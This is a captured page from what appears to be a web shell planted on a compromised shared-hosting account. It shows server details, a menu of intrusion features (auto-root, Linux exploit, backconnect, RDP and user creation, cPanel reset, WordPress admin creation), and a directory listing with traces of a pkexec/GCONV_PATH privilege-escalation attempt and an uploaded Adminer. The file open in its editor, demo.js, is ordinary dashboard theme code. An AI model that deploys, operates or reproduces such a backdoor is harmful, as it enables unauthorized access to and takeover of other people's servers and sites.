Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
assets_dashboard /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
plugins-init
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
custom.min.js
6.49
KB
-rw-r--r--
demo.js
6.45
KB
-rw-r--r--
deznav-init.js
1.26
KB
-rw-r--r--
styleSwitcher.js
25.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : demo.js
var themeOptionArr = { typography: '', version: '', layout: '', primary: '', headerBg: '', navheaderBg: '', sidebarBg: '', sidebarStyle: '', sidebarPosition: '', headerPosition: '', containerLayout: '', direction: '', }; /* Cookies Function */ function setCookie(cname, cvalue, exhours) { var d = new Date(); d.setTime(d.getTime() + (30*60*1000)); /* 30 Minutes */ var expires = "expires="+ d.toString(); document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/"; } function getCookie(cname) { var name = cname + "="; var decodedCookie = decodeURIComponent(document.cookie); var ca = decodedCookie.split(';'); for(var i = 0; i <ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length, c.length); } } return ""; } function deleteCookie(cname) { var d = new Date(); d.setTime(d.getTime() + (1)); // 1/1000 second var expires = "expires="+ d.toString(); //document.cookie = cname + "=1;" + expires + ";path=/"; document.cookie = cname + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT"+";path=/"; } function deleteAllCookie(reload = true) { jQuery.each(themeOptionArr, function(optionKey, optionValue) { deleteCookie(optionKey); }); if(reload){ location.reload(); } } /* Cookies Function END */ (function($) { "use strict" var direction = getUrlParams('dir'); var theme = getUrlParams('theme'); /* Dz Theme Demo Settings */ var dezThemeSet0 = { /* Default Theme */ typography: "poppins", version: "dark", layout: "vertical", headerBg: "color_1", primary: "color_1", navheaderBg: "color_1", sidebarBg: "color_1", sidebarStyle: "full", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet1 = { typography: "poppins", version: "light", layout: "vertical", headerBg: "color_1", primary: "color_5", navheaderBg: "color_5", sidebarBg: "color_5", sidebarStyle: "full", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet2 = { typography: "poppins", version: "light", layout: "vertical", primary: "color_7", headerBg: "color_1", navheaderBg: "color_7", sidebarBg: "color_1", sidebarStyle: "modern", sidebarPosition: "static", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet3 = { typography: "poppins", version: "light", layout: "vertical", primary: "color_15", headerBg: "color_1", navheaderBg: "color_13", sidebarBg: "color_13", sidebarStyle: "full", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet4 = { typography: "poppins", version: "light", layout: "vertical", primary: "color_9", headerBg: "color_9", navheaderBg: "color_9", sidebarBg: "color_1", sidebarStyle: "compact", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet5 = { typography: "poppins", version: "light", layout: "vertical", primary: "color_1", headerBg: "color_1", navheaderBg: "color_1", sidebarBg: "color_1", sidebarStyle: "full", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet6 = { typography: "poppins", version: "light", layout: "vertical", primary: "color_1", headerBg: "color_1", navheaderBg: "color_3", sidebarBg: "color_1", sidebarStyle: "mini", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet7 = { typography: "poppins", version: "light", layout: "vertical", primary: "color_2", headerBg: "color_1", navheaderBg: "color_2", sidebarBg: "color_2", sidebarStyle: "mini", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; var dezThemeSet8 = { typography: "poppins", version: "light", layout: "vertical", primary: "color_2", headerBg: "color_14", navheaderBg: "color_14", sidebarBg: "color_2", sidebarStyle: "full", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", direction: direction }; function themeChange(theme, direction){ var themeSettings = {}; themeSettings = eval('dezThemeSet'+theme); themeSettings.direction = direction; dezSettingsOptions = themeSettings; /* For Screen Resize */ new dezSettings(themeSettings); setThemeInCookie(themeSettings); } function setThemeInCookie(themeSettings) { //console.log(themeSettings); jQuery.each(themeSettings, function(optionKey, optionValue) { setCookie(optionKey,optionValue); }); } function setThemeLogo() { var logo = getCookie('logo_src'); var logo2 = getCookie('logo_src2'); if(logo != ''){ jQuery('.nav-header .logo-abbr').attr("src", logo); } if(logo2 != ''){ jQuery('.nav-header .logo-compact, .nav-header .brand-title').attr("src", logo2); } } function setThemeOptionOnPage() { if(getCookie('version') != '') { jQuery.each(themeOptionArr, function(optionKey, optionValue) { var optionData = getCookie(optionKey); themeOptionArr[optionKey] = (optionData != '')?optionData:dezSettingsOptions[optionKey]; }); console.log(themeOptionArr); dezSettingsOptions = themeOptionArr; new dezSettings(dezSettingsOptions); setThemeLogo(); } } jQuery(document).on('click', '.dz_theme_demo', function(){ var demoTheme = jQuery(this).data('theme'); themeChange(demoTheme, 'ltr'); }); jQuery(document).on('click', '.dz_theme_demo_rtl', function(){ var demoTheme = jQuery(this).data('theme'); themeChange(demoTheme, 'rtl'); }); jQuery(window).on('load', function(){ direction = (direction != undefined)?direction:'ltr'; if(theme != undefined){ themeChange(theme, direction); }else if(direction != undefined){ if(getCookie('version') == ''){ themeChange(0, direction); } } /* Set Theme On Page From Cookie */ setThemeOptionOnPage(); }); })(jQuery);
Close